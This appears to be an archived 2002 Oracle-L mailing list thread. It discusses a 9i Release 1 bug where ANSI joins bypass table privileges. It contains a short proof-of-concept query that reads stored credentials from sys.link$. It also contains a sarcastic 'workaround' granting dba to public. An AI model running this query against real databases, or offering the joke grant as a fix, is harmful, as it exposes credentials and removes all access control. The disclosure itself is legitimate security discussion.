Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> RE: Security Hole

RE: Security Hole

From: <Scott.Shafer_at_dcpds.cpms.osd.mil>
Date: Wed, 17 Apr 2002 08:33:49 -0800
Message-ID: <F001.00446AAE.20020417083349@fatcity.com>


Look at the bright side - there's always someone looking for a new job...

Scott Shafer
San Antonio, TX
210-581-6217

> -----Original Message-----
> From: Mark Leith [SMTP:mark_at_cool-tools.co.uk]
> Sent: Wednesday, April 17, 2002 4:38 AM
> To: Multiple recipients of list ORACLE-L
> Subject: RE: Security Hole
>
> I wonder how many people have rushed out to do this on their production
> instances now? ;P
>
> -----Original Message-----
> McDonald
> Sent: 16 April 2002 23:23
> To: Multiple recipients of list ORACLE-L
>
>
> The problem can be worked around by issuing:
>
> grant dba, select any table, select any dictionary to
> public;
>
> Then the bug does not appear to be observed :-)
>
> Connor
>
> --- Anjo Kolk <anjo_at_oraperf.com> wrote: >
> > There should be an emergency backport available for
> > that fix/problem. If
> > not, who wants to use 9i release 1 ?
> >
> > Anjo.
> >
> > Mark Leith wrote:
> >
> > > "9i - Can't break it, can't break in!" ?!?!? ;0P
> > >
> > > -----Original Message-----
> > > Lewis
> > > Sent: 16 April 2002 12:33
> > > To: Multiple recipients of list ORACLE-L
> > >
> > > This just in from comp.databases.oracle.server.
> > >
> > > See metalink bug 2121935.
> > >
> > > Using ANSI syntax joins (CROSS JOIN, LEFT OUTER
> > etc)
> > > allows you to view data from tables on which you
> > have no
> > > privilege. For example, try this COMPLETE script:
> > >
> > > connect / as sysdba
> > > create user us1 identified by us1;
> > > grant create session to us1;
> > >
> > > connect us1/us1
> > >
> > > select userid, password
> > > from
> > > sys.link$ cross join dual
> > > ;
> > >
> > > Worse still, if you have the privilege to create
> > views
> > > then this loophole allows you to seek and destroy
> > > ANY DATA in the database that you might want to.
> > >
> > > The bug is fixed in 9iR2. I didn't see any note
> > > about a backport, or a security alert on OTN.
> > >
> > > Conclusion:
> > >
> > > 9.0.1 should not be in use on production
> > system
> > > until Oracle supplies a fix.
> > >
> > > Jonathan Lewis
> > > http://www.jlcomp.demon.co.uk
> > >
> > > Author of:
> > > Practical Oracle 8i: Building Efficient Databases
> > >
> > > Next Seminar - Australia - July/August
> > > http://www.jlcomp.demon.co.uk/seminar.html
> > >
> > > Host to The Co-Operative Oracle Users' FAQ
> > > http://www.jlcomp.demon.co.uk/faq/ind_faq.html
> > >
> > > --
> > > Please see the official ORACLE-L FAQ:
> > http://www.orafaq.com
> > > --
> > > Author: Jonathan Lewis
> > > INET: jonathan_at_jlcomp.demon.co.uk
> > >
> > > Fat City Network Services -- (858) 538-5051
> > FAX: (858) 538-5051
> > > San Diego, California -- Public Internet
> > access / Mailing Lists
> > >
> >
> --------------------------------------------------------------------
> > > To REMOVE yourself from this mailing list, send an
> > E-Mail message
> > > to: ListGuru_at_fatcity.com (note EXACT spelling of
> > 'ListGuru') and in
> > > the message BODY, include a line containing: UNSUB
> > ORACLE-L
> > > (or the name of mailing list you want to be
> > removed from). You may
> > > also send the HELP command for other information
> > (like subscribing).
> > > --
> > > Please see the official ORACLE-L FAQ:
> > http://www.orafaq.com
> > > --
> > > Author: Mark Leith
> > > INET: mark_at_cool-tools.co.uk
> > >
> > > Fat City Network Services -- (858) 538-5051
> > FAX: (858) 538-5051
> > > San Diego, California -- Public Internet
> > access / Mailing Lists
> > >
> >
> --------------------------------------------------------------------
> > > To REMOVE yourself from this mailing list, send an
> > E-Mail message
> > > to: ListGuru_at_fatcity.com (note EXACT spelling of
> > 'ListGuru') and in
> > > the message BODY, include a line containing: UNSUB
> > ORACLE-L
> > > (or the name of mailing list you want to be
> > removed from). You may
> > > also send the HELP command for other information
> > (like subscribing).
> >
> >
> > --
> > Please see the official ORACLE-L FAQ:
> > http://www.orafaq.com
> > --
> > Author: Anjo Kolk
> > INET: anjo_at_oraperf.com
> >
> > Fat City Network Services -- (858) 538-5051 FAX:
> > (858) 538-5051
> > San Diego, California -- Public Internet
> > access / Mailing Lists
> >
> --------------------------------------------------------------------
> > To REMOVE yourself from this mailing list, send an
> > E-Mail message
> > to: ListGuru_at_fatcity.com (note EXACT spelling of
> > 'ListGuru') and in
> > the message BODY, include a line containing: UNSUB
> > ORACLE-L
> > (or the name of mailing list you want to be removed
> > from). You may
> > also send the HELP command for other information
> > (like subscribing).
>
> =====
> Connor McDonald
> http://www.oracledba.co.uk (mirrored at
> http://www.oradba.freeserve.co.uk)
>
> "Some days you're the pigeon, some days you're the statue"
>
> __________________________________________________
> Do You Yahoo!?
> Everything you'll ever need on one web page
> from News and Sport to Email and Music Charts
> http://uk.my.yahoo.com
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author: =?iso-8859-1?q?Connor=20McDonald?=
> INET: hamcdc_at_yahoo.co.uk
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author: Mark Leith
> INET: mark_at_cool-tools.co.uk
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).

-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- 
Author: 
  INET: Scott.Shafer_at_dcpds.cpms.osd.mil

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).
Received on Wed Apr 17 2002 - 11:33:49 CDT

Original text of this message

HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US